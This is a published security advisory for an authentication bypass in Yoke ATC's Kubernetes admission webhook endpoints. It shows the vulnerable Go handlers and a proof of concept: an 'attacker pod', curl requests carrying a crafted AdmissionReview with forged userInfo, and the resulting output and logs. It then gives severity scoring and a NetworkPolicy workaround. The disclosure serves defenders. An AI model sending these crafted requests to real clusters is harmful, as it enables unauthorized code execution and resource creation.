GHSA-965M-V4CC-6334
Vulnerability from github – Published: 2026-02-12 22:06 – Updated: 2026-02-13 17:15
VLAI?
Summary
Unauthenticated Admission Webhook Endpoints in Yoke ATC
Details
Unauthenticated Admission Webhook Endpoints in Yoke ATC
This vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.
Recommended CWE: CWE-306 (Missing Authentication for Critical Function)
Summary
Yoke ATC implements multiple Admission Webhook endpoints (/validations/{airway}, /validations/resources, /validations/flights.yoke.cd, /validations/airways.yoke.cd, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.
Details
The vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.
Vulnerable Endpoint Handlers (cmd/atc/handler.go:147-335):
mux.HandleFunc("POST /validations/{airway}", func(w http.ResponseWriter, r *http.Request) {
var review admissionv1.AdmissionReview
if err := json.NewDecoder(r.Body).Decode(&review); err != nil {
http.Error(w, fmt.Sprintf("failed to decode review: %v", err), http.StatusBadRequest)
return
}
// No authentication check - request is processed directly
// ...
})
Additional Unauthenticated Endpoints:
- /validations/resources (cmd/atc/handler.go:337-538)
- /validations/external-resources (cmd/atc/handler.go:540-597)
- /validations/airways.yoke.cd (cmd/atc/handler.go:599-636)
- /validations/flights.yoke.cd (cmd/atc/handler.go:638-733)
- /crdconvert/{airway} (cmd/atc/handler.go:61-145)
The code lacks: 1. TLS client certificate verification 2. Request source validation (verifying requests come from kube-apiserver) 3. Any form of authentication middleware
PoC
Environment Setup
Prerequisites: - Docker installed and running - kubectl installed - Go 1.21+ installed - kind installed
Step 1: Create Kind cluster
cat > /tmp/kind-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: yoke-vuln-test
nodes:
- role: control-plane
EOF
kind create cluster --config /tmp/kind-config.yaml
Step 2: Build and install Yoke CLI
git clone https://github.com/yokecd/yoke.git
cd yoke
GOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke
Step 3: Deploy ATC
/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest
Step 4: Deploy Backend Airway example
/tmp/yoke takeoff -wait 60s backendairway "https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz"
Exploitation Steps
Step 1: Create attacker pod
kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: webhook-attacker
namespace: default
spec:
containers:
- name: attacker
image: curlimages/curl:latest
command: ["sleep", "infinity"]
EOF
kubectl wait --for=condition=Ready pod/webhook-attacker --timeout=60s
Step 2: Probe webhook endpoints from attacker pod
kubectl exec webhook-attacker -- curl -k -s -w "\nHTTP_CODE: %{http_code}" \
-X POST https://atc-atc.atc.svc.cluster.local:80/validations/resources \
-H "Content-Type: application/json" -d '{}'
Actual output from verification:
panic
HTTP_CODE: 500
The HTTP 500 response (not 401/403) indicates the endpoint is accessible without authentication. The error is due to invalid request body format, not authentication failure.
Step 3: Send crafted AdmissionReview request
Create malicious request file:
cat > /tmp/malicious-review.json << 'EOF'
{
"apiVersion": "admission.k8s.io/v1",
"kind": "AdmissionReview",
"request": {
"uid": "vul002-exploit-uid",
"kind": {"group": "examples.com", "version": "v1", "kind": "Backend"},
"resource": {"group": "examples.com", "version": "v1", "resource": "backends"},
"name": "exploit-backend",
"namespace": "default",
"operation": "CREATE",
"userInfo": {"username": "attacker-from-pod", "groups": ["system:unauthenticated"]},
"object": {
"apiVersion": "examples.com/v1",
"kind": "Backend",
"metadata": {"name": "exploit-backend", "namespace": "default"},
"spec": {"image": "nginx:latest", "replicas": 1}
}
}
}
EOF
kubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json
Send the request:
kubectl exec webhook-attacker -- curl -k -s -X POST \
https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \
-H "Content-Type: application/json" \
-d @/tmp/malicious-review.json
Actual output from verification:
{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"vul002-normal-test","kind":{"group":"examples.com","version":"v1","kind":"Backend"},"resource":{"group":"examples.com","version":"v1","resource":"backends"},"name":"vul002-normal-backend","namespace":"default","operation":"CREATE","userInfo":{"username":"attacker-from-pod","groups":["system:unauthenticated"]},"object":{"apiVersion":"examples.com/v1","kind":"Backend","metadata":{"name":"vul002-normal-backend","namespace":"default"},"spec":{"image":"nginx:latest","replicas":1}},"oldObject":null,"options":null},"response":{"uid":"vul002-normal-test","allowed":false,"status":{"metadata":{},"status":"Failure","message":"applying resource returned errors during dry-run..."}}}
Step 4: Verify ATC logs
kubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com
Actual log output:
{"time":"2026-02-01T15:29:08.890991543Z","level":"INFO","msg":"request served","component":"server","code":200,"method":"POST","path":"/validations/backends.examples.com","elapsed":"435ms","validation":{"allowed":false,"status":"Invalid"}}
The elapsed: 435ms indicates WASM module execution occurred.
Expected Result
The attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:
1. No TLS client certificate is required
2. No request source validation occurs
3. The fake userInfo is accepted without verification
4. WASM modules are executed based on unauthenticated requests
Impact
Vulnerability Type: Missing Authentication / Authentication Bypass
Attack Prerequisites: - Attacker has access to a pod within the cluster network - Network policies do not restrict access to the ATC service (common in default configurations)
Impact Assessment: - Confidentiality: Medium - Attacker can trigger WASM execution which may access controller context data - Integrity: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources - Availability: Medium - Attacker can cause resource exhaustion through repeated requests
Attack Scenario: 1. Attacker compromises a pod or gains access to the cluster network 2. Attacker sends crafted AdmissionReview requests directly to ATC webhook 3. ATC processes requests without verifying they came from the API Server 4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code 5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges
Severity
CVSS v3.1 Score: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
- Attack Vector (AV): Network - Accessible from cluster network
- Attack Complexity (AC): Low - Simple HTTP request
- Privileges Required (PR): None - No authentication required
- User Interaction (UI): None - Automatic processing
- Scope (S): Unchanged
- Confidentiality (C): None - Direct impact limited
- Integrity (I): High - Can trigger unauthorized WASM execution
- Availability (A): None - No direct availability impact
Note: When combined with VUL-001, the overall impact increases significantly.
Affected Versions
- Yoke ATC v0.18.x and earlier versions
- All versions that implement Admission Webhook endpoints without client authentication
Patched Versions
No patch available at time of disclosure.
Workarounds
- Network Policy: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: atc-webhook-policy
namespace: atc
spec:
podSelector:
matchLabels:
yoke.cd/app: atc
policyTypes:
- Ingress
ingress:
- from:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: kube-system
podSelector:
matchLabels:
component: kube-apiserver
-
Service Mesh: Use a service mesh (Istio, Linkerd) to enforce mTLS between services
-
Pod Security: Implement strict pod security policies to limit which pods can be created in the cluster
References
- Yoke Project: https://github.com/yokecd/yoke
- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/
- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html
Credits
credit for: @b0b0haha (603571786@qq.com) @lixingquzhi (mayedoushidalao@163.com)
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/yokecd/yoke"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.19.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-26055"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-12T22:06:36Z",
"nvd_published_at": "2026-02-12T22:16:06Z",
"severity": "HIGH"
},
"details": "# Unauthenticated Admission Webhook Endpoints in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.\n\n**Recommended CWE**: CWE-306 (Missing Authentication for Critical Function)\n\n## Summary\n\nYoke ATC implements multiple Admission Webhook endpoints (`/validations/{airway}`, `/validations/resources`, `/validations/flights.yoke.cd`, `/validations/airways.yoke.cd`, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server\u0027s authentication and authorization mechanisms.\n\n## Details\n\nThe vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.\n\n**Vulnerable Endpoint Handlers** (`cmd/atc/handler.go:147-335`):\n```go\nmux.HandleFunc(\"POST /validations/{airway}\", func(w http.ResponseWriter, r *http.Request) {\n var review admissionv1.AdmissionReview\n if err := json.NewDecoder(r.Body).Decode(\u0026review); err != nil {\n http.Error(w, fmt.Sprintf(\"failed to decode review: %v\", err), http.StatusBadRequest)\n return\n }\n // No authentication check - request is processed directly\n // ...\n})\n```\n\n**Additional Unauthenticated Endpoints**:\n- `/validations/resources` (`cmd/atc/handler.go:337-538`)\n- `/validations/external-resources` (`cmd/atc/handler.go:540-597`)\n- `/validations/airways.yoke.cd` (`cmd/atc/handler.go:599-636`)\n- `/validations/flights.yoke.cd` (`cmd/atc/handler.go:638-733`)\n- `/crdconvert/{airway}` (`cmd/atc/handler.go:61-145`)\n\nThe code lacks:\n1. TLS client certificate verification\n2. Request source validation (verifying requests come from kube-apiserver)\n3. Any form of authentication middleware\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat \u003e /tmp/kind-config.yaml \u003c\u003c \u0027EOF\u0027\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\n**Step 4: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\n### Exploitation Steps\n\n**Step 1: Create attacker pod**\n```bash\nkubectl apply -f - \u003c\u003cEOF\napiVersion: v1\nkind: Pod\nmetadata:\n name: webhook-attacker\n namespace: default\nspec:\n containers:\n - name: attacker\n image: curlimages/curl:latest\n command: [\"sleep\", \"infinity\"]\nEOF\n\nkubectl wait --for=condition=Ready pod/webhook-attacker --timeout=60s\n```\n\n**Step 2: Probe webhook endpoints from attacker pod**\n```bash\nkubectl exec webhook-attacker -- curl -k -s -w \"\\nHTTP_CODE: %{http_code}\" \\\n -X POST https://atc-atc.atc.svc.cluster.local:80/validations/resources \\\n -H \"Content-Type: application/json\" -d \u0027{}\u0027\n```\n\nActual output from verification:\n```\npanic\n\nHTTP_CODE: 500\n```\n\nThe HTTP 500 response (not 401/403) indicates the endpoint is accessible without authentication. The error is due to invalid request body format, not authentication failure.\n\n**Step 3: Send crafted AdmissionReview request**\n\nCreate malicious request file:\n```bash\ncat \u003e /tmp/malicious-review.json \u003c\u003c \u0027EOF\u0027\n{\n \"apiVersion\": \"admission.k8s.io/v1\",\n \"kind\": \"AdmissionReview\",\n \"request\": {\n \"uid\": \"vul002-exploit-uid\",\n \"kind\": {\"group\": \"examples.com\", \"version\": \"v1\", \"kind\": \"Backend\"},\n \"resource\": {\"group\": \"examples.com\", \"version\": \"v1\", \"resource\": \"backends\"},\n \"name\": \"exploit-backend\",\n \"namespace\": \"default\",\n \"operation\": \"CREATE\",\n \"userInfo\": {\"username\": \"attacker-from-pod\", \"groups\": [\"system:unauthenticated\"]},\n \"object\": {\n \"apiVersion\": \"examples.com/v1\",\n \"kind\": \"Backend\",\n \"metadata\": {\"name\": \"exploit-backend\", \"namespace\": \"default\"},\n \"spec\": {\"image\": \"nginx:latest\", \"replicas\": 1}\n }\n }\n}\nEOF\n\nkubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. Malicious WASM can create resources or exfiltrate data using ATC\u0027s cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. **Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)",
"id": "GHSA-965m-v4cc-6334",
"modified": "2026-02-13T17:15:36Z",
"published": "2026-02-12T22:06:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26055"
},
{
"type": "PACKAGE",
"url": "https://github.com/yokecd/yoke"
},
{
"type": "WEB",
"url": "https://github.com/yokecd/yoke/blob/bc9c576a790df8c42aa06b90fb406220f1de22a0/cmd/atc/handler.go#L148-L153"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Unauthenticated Admission Webhook Endpoints in Yoke ATC"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…